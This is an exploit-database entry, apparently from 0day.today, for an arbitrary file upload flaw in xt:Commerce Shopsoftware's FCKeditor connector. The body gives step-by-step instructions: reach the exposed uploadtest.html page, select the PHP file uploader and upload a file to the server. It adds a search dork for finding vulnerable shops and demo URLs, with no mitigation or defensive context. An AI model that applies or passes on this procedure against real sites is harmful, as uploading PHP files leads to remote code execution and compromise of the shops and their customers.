[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

xt:Commerce Shopsoftware (fckeditor) Arbitrary File Upload

Author
Net.Edit0r
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14770
Category
web applications
Date add
09-11-2010
Platform
php
==========================================================
xt:Commerce Shopsoftware (fckeditor) Arbitrary File Upload
==========================================================

###################################################
#
# Exploit Title: xt:Commerce Shopsoftware (fckeditor)
# Date: 08/11/2010
# Author: Net.Edit0r
# Software Link: www.xt-commerce.com/
# Version: 3 & 4
# Tested on: Linux Ubuntu 9.04
# dork : "eCommerce Engine © 2006 xt:Commerce Shopsoftware"
# Contact: Net.Edit0r@att.net ~ Black.hat.tm@gmail.com
#
####################################################
 
    exploit # admin/includes/modules/fckeditor/editor/filemanager/connectors/uploadtest.html
 
first go to # http://site.com/[shop]
 
       then # http://site.com/[shop]/admin/includes/modules/fckeditor/editor/filemanager/connectors/uploadtest.html
 
     select # Select the "File Uploader"> php ... upload to : Uploaded
File URL:
 
Demo : http://www.site.com/admin/includes/modules/fckeditor/editor/filemanager/connectors/uploadtest.html
 
Demo : http://www.site.com/admin/includes/modules/fckeditor/editor/filemanager/connectors/uploadtest.html
 
#######################################################



#  0day.today [2024-12-25]  #